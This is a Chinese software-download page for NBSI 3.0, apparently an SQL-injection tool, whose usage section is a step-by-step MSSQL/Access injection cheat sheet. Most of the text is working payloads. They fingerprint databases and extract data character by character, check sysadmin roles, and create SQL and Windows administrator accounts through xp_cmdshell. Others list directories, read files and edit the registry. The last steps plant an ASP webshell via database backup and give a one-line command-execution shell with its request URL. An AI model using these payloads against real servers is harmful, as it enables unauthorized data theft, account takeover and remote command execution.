列表格式显示

热搜词:winrar    ftp   office   photoshop   输入法   ghost   win7  

10安全相关 - 分类

广告招商中......
联系方式!

网络安全 - 时间排序 更多...
    网络安全 - 点击排序 更多...
      网络安全 - 大小排序 更多...
        作者

         

        最近发布的软件 更多>>

        首页 >> 10安全相关>> 网络安全>>nbsi网站漏洞检测工具 发布者:admin >> 本人发布的更多软件

        广告招商中...... 联系方式!

        nbsi网站漏洞检测工具 

             
        软件厂家: 官方网站:
        大小: 语言:
        类型: 类别:
        更新时间: 运行环境:
        ;开始下载地址
        软件标签: nbsi sql

        nbsi 3.0纯净版 是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率,欢迎来绿色资源网下载!

        nbsi 3.0纯净版简介

        本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由vb语言编写的网站漏洞检测工具的名称,asp注入漏洞检测工具,特别在 sql server 注入检测方面有极高的准确率。

        nbsi官方版使用说明

        1.判断是否有注入

        ;and 1=1

        ;and 1=2

        2.初步判断是否是mssql

        ;and user>0

        3.判断数据库系统

        ;and (select count(*) from sysobjects)>0 mssql

        ;and (select count(*) from msysobjects)>0 access

        4.注入参数是字符

        “and [查询条件] and ““=“

        5.搜索时没过滤参数的

        “and [查询条件] and “%25“=“

        6.猜数据库

        ;and (select count(*) from [数据库名])>0

        7.猜字段

        ;and (select count(字段名) from 数据库名)>0

        8.猜字段中记录长度

        ;and (select top 1 len(字段名) from 数据库名)>0

        9.(1)猜字段的ascii值(access)

        ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

        (2)猜字段的ascii值(mssql)

        ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

        10.测试权限结构(mssql)

        ;and 1=(select is_srvrolemember(“sysadmin“));--

        ;and 1=(select is_srvrolemember(“serve radmin “));--

        ;and 1=(select is_srvrolemember(“setupadmin“));--

        ;and 1=(select is_srvrolemember(“securityadmin“));--

        ;and 1=(select is_srvrolemember(“diskadmin“));--

        ;and 1=(select is_srvrolemember(“bulkadmin“));--

        ;and 1=(select is_member(“db_owner“));--

        11.添加mssql和系统的帐户

        ;exec master.dbo.sp_addlogin username;--

        ;exec master.dbo.sp_password null,

        username,password;--

        ;exec master.dbo.sp_addsrvrolemember sysadmin

        username;--

        ;exec master.dbo.xp_cmdshell “net user username

        password /workstations:* /times:all

        /passwordchg:yes /passwordreq:yes /active:yes /add“

        ;--

        ;exec master.dbo.xp_cmdshell “net user username

        password /add“;--

        ;exec master.dbo.xp_cmdshell “net localgroup

        administrators username /add“;--

        12.(1)遍历目录

        ;create table dirs(paths varchar(100), id int)

        ;insert dirs exec master.dbo.xp_dirtree “c:\“

        ;and (select top 1 paths from dirs)>0

        ;and (select top 1 paths from dirs where paths not

        in(“上步得到的paths“))>)

        (2)遍历目录

        ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

        ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

        ;insert into temp(id) exec master.dbo.xp_subdirs “c:\“;-- 获得子目录列表

        ;insert into temp(id,num1) exec master.dbo.xp_dirtree “c:\“;-- 获得所有子目录的目录树结构

        ;insert into temp(id) exec master.dbo.xp_cmdshell “type c:\web\index.asp“;-- 查看文件的内容

        13.mssql中的存储过程

        xp_regenumvalues 注册表根键, 子键

        ;exec xp_regenumvalues “hkey_local_machine“,

        “software\microsoft\windows\currentversion\run“ 以多个记录集方式返回所有键值

        xp_regread 根键,子键,键值名

        ;exec xp_regread “hkey_local_machine“,

        “software\microsoft\windows\currentversion“,

        “commonfilesdir“ 返回制定键的值

        xp_regwrite 根键,子键, 值名, 值类型, 值

        值类型有2种reg_sz 表示字符型,reg_dword 表示整型

        ;exec xp_regwrite “hkey_local_machine“,

        “software\microsoft\windows\currentversion“,

        “testvaluename“,“reg_sz“,“hello“ 写入注册表

        xp_regdeletevalue 根键,子键,值名

        exec xp_regdeletevalue “hkey_local_machine“,

        “software\microsoft\windows\currentversion“,

        “testvaluename“ 删除某个值

        xp_regdeletekey “hkey_local_machine“,

        “software\microsoft\windows\currentversion\testk

        ey“ 删除键,包括该键下所有值

        14.mssql的backup创建webshell

        use model

        create table cmd(str image);

        insert into cmd(str) values (“<% dim oscript %>“);

        backup database model to disk=“c:\l.asp“;

        15.mssql内置函数

        ;and (select @@version)>0 获得windows的版本号

        ;and user_name()=“dbo“ 判断当前系统的连接用户是不是sa

        ;and (select user_name())>0 爆当前系统的连接用户

        ;and (select db_name())>0 得到当前连接的数据库

        16.简洁的webshell

        use model

        create table cmd(str image);

        insert into cmd(str) values (“<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>“);

        backup database model to disk=“g:\wwwtest\l.asp“;

        请求的时候,像这样子用:

        http://ip/l.asp?c=dir

        解压密码:www.down80.com


        本页Html网址:/htmlsoft/362321.html

        本页aspx网址:/soft.aspx?id=362321&bianhao=20240111_233152_173558&kind1=10安全相关&kind2=网络安全

        上一篇:Microsoft isa server 2006 64位系统客户端

        下一篇:工艺品战斗机官方版

        增加   


        相关评论        新窗口打开查看评论